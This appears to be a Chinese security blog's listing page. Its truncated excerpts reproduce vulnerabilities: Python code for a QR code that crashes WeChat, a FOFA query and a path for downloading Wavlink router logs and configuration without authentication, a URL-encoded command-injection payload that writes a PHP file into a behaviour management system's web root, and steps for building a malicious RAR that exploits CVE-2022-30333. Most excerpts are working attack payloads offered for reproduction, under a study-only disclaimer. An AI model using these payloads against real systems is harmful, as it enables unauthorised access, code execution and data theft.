主要关注网络安全方面的技术、知识和趋势,旨在为网络安全行业的发展做出贡献。
注:代码可能带有破坏性,仅用于学习,分析用途。 微信崩溃了?微信最新版二维码Bug,不知道问题在哪里。使用下面代码,轻松帮你复现。 安装qrcode pip isntall qrcode 生成代码: import qrcode from qrcode.util import QRData, MODE_NUMBER, MODE_8BIT_BYTE def nvwu_put(self, num, length): …
漏洞说明 Wavlink WN530HG4 M30HG4.V5030.191116中存在访问控制问题,未经验证的攻击者可以下载日志文件和配置数据。 影响版本 Wavlink WN530HG4 M30HG4.V5030.191116 漏洞复现 fofa:title="Wi-Fi APP Login" payload:/cgi-bin/Expor…
某信-上网行为管理系统 一句话 /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20 echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a Base64 版 /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20…
1. 描述 UnRAR二进制文件中的路径遍历漏洞(CVE-2022-30333) 在github 公布项目poc中(地址:https://github.com/TheL1ghtVn/CVE-2022-30333-PoC),存在rar的poc。 通过winhex打开可见,一个rar中存在俩个同名为,sym的文件夹 查询资料,得到构造rar需求如下,需要一个rar中放置一个sl软连接,和一个sl的文件夹,里面存放恶意的payload文件。…